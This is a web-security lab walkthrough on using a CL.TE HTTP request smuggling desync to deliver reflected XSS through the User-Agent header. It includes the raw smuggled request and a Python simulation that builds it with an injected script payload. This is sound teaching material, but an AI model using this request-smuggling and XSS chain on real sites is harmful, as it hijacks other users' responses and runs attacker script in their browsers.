Lab: Exploiting HTTP request smuggling to deliver reflected XSS
This lab involves a front-end and back-end server, and the front-end server doesn't support chunked encoding: it frames requests by Content-Length, while the back-end server honours Transfer-Encoding: chunked (a CL.TE desync).
The application is also vulnerable to reflected XSS via the User-Agent header.
To solve the lab, smuggle a request to the back-end server that causes the next user's request to receive a response containing an XSS exploit that executes
The lab simulates the activity of a victim user. Every few POST requests that you make to the lab, the victim user will make their own request. You might need to repeat your attack a few times to ensure that the victim user's request occurs as required.
Visit a blog post, and send the request to Burp Repeater.
Observe that the comment form contains your User-Agent header in a hidden input.
Inject an XSS payload into the User-Agent header and observe that it gets reflected:
Smuggle this XSS request to the back-end server, so that it exploits the next visitor. The front end forwards the whole body because it only looks at Content-Length; the back end reads the chunked body up to the terminating 0 chunk and treats everything after it as the start of the next request on that connection:

POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: <exact byte count of everything after the blank line>
Transfer-Encoding: chunked

0

GET /post?postId=5 HTTP/1.1
User-Agent: <the XSS payload from the previous step>

Replace YOUR-LAB-ID and the angle-bracket placeholders with your own lab host and values. The outer Content-Length must be exact (enable Burp Repeater's "Update Content-Length" option): too short and the tail of the smuggled request is never sent, too long and the front end waits for bytes that never arrive. The smuggled GET ends with its own blank line, so the back end treats it as a complete request and answers it; the front end then delivers that queued response, with the payload reflected into the hidden input, to the next request it forwards on the same connection.
Note that the target user only browses the website intermittently, so you may need to repeat this attack a few times before it's successful.
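The framing difference that the whole attack rests on is easy to get wrong by a byte, so the following added example (not part of the lab or PortSwigger's own material) builds the CL.TE request with an exactly computed Content-Length and then parses the same byte stream twice: once the way a Content-Length-only front end would, and once the way a chunked-aware back end would. The lab host, the victim's request and the `alert(1)` payload that breaks out of the hidden input's value attribute are constructed assumptions.

```python
"""Constructed CL.TE simulation: a Content-Length-only front end versus a
chunked-aware back end framing the same bytes. Not the lab's own code."""

CRLF = "\r\n"


def build_smuggled_request(host, xss_payload, post_id=5):
    """Build the attacker's POST whose chunked body carries a GET with an
    XSS payload in User-Agent. Content-Length is computed exactly over the
    bytes after the blank line, as Burp's "Update Content-Length" would."""
    # The smuggled GET ends with its own blank line, so the back end sees it
    # as a complete request rather than as a prefix for the victim's request.
    smuggled = (
        f"GET /post?postId={post_id} HTTP/1.1{CRLF}"
        f"User-Agent: {xss_payload}{CRLF}"
        f"{CRLF}"
    )
    outer_body = f"0{CRLF}{CRLF}{smuggled}"  # terminating chunk, then the smuggled GET
    outer = (
        f"POST / HTTP/1.1{CRLF}"
        f"Host: {host}{CRLF}"
        f"Content-Type: application/x-www-form-urlencoded{CRLF}"
        f"Content-Length: {len(outer_body.encode())}{CRLF}"
        f"Transfer-Encoding: chunked{CRLF}"
        f"{CRLF}"
        f"{outer_body}"
    )
    return outer.encode()


def split_headers(buf):
    """Return (header text, remaining bytes) for the first request in buf."""
    idx = buf.index(b"\r\n\r\n")
    return buf[:idx].decode(), buf[idx + 4:]


def parse_headers(header_text):
    """Return (request line, {lower-cased header name: value})."""
    lines = header_text.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def frame_by_content_length(buf):
    """Front end: honours Content-Length and ignores Transfer-Encoding."""
    requests = []
    while buf:
        header_text, rest = split_headers(buf)
        request_line, headers = parse_headers(header_text)
        n = int(headers.get("content-length", "0"))
        body, buf = rest[:n], rest[n:]
        requests.append((request_line, headers, body))
    return requests


def frame_by_chunked(buf):
    """Back end: prefers Transfer-Encoding: chunked over Content-Length."""
    requests = []
    while buf:
        header_text, rest = split_headers(buf)
        request_line, headers = parse_headers(header_text)
        if headers.get("transfer-encoding") == "chunked":
            body = b""
            while True:
                size_line, _, rest = rest.partition(b"\r\n")
                size = int(size_line.split(b";")[0].decode(), 16)
                if size == 0:
                    _, _, rest = rest.partition(b"\r\n")  # empty trailer section
                    break
                body += rest[:size]
                rest = rest[size + 2:]  # skip chunk data and its trailing CRLF
        else:
            n = int(headers.get("content-length", "0"))
            body, rest = rest[:n], rest[n:]
        requests.append((request_line, headers, body))
        buf = rest
    return requests


def demo():
    """Return (front-end view, back-end view) of attacker + victim traffic."""
    host = "YOUR-LAB-ID.web-security-academy.net"  # placeholder lab host
    payload = 'a"/><script>alert(1)</script>'       # assumed payload; closes value="..." and the tag
    attacker = build_smuggled_request(host, payload)
    victim = f"GET / HTTP/1.1{CRLF}Host: {host}{CRLF}{CRLF}".encode()  # constructed victim request
    wire = attacker + victim  # both arrive on one reused back-end connection
    return frame_by_content_length(wire), frame_by_chunked(wire)


if __name__ == "__main__":
    front, back = demo()
    print(f"front end framed {len(front)} requests, back end framed {len(back)}")
    print("extra request seen only by the back end:", back[1][0], "| User-Agent:", back[1][1]["user-agent"])
```

The front end sees two requests (the attacker's POST and the victim's GET), while the back end sees three: the POST with an empty chunked body, the smuggled GET carrying the payload, and the victim's GET. Change the `0` chunk line or drop a CRLF in `smuggled` and the back end's view changes immediately, which is exactly the sensitivity that makes the exact Content-Length matter in Burp.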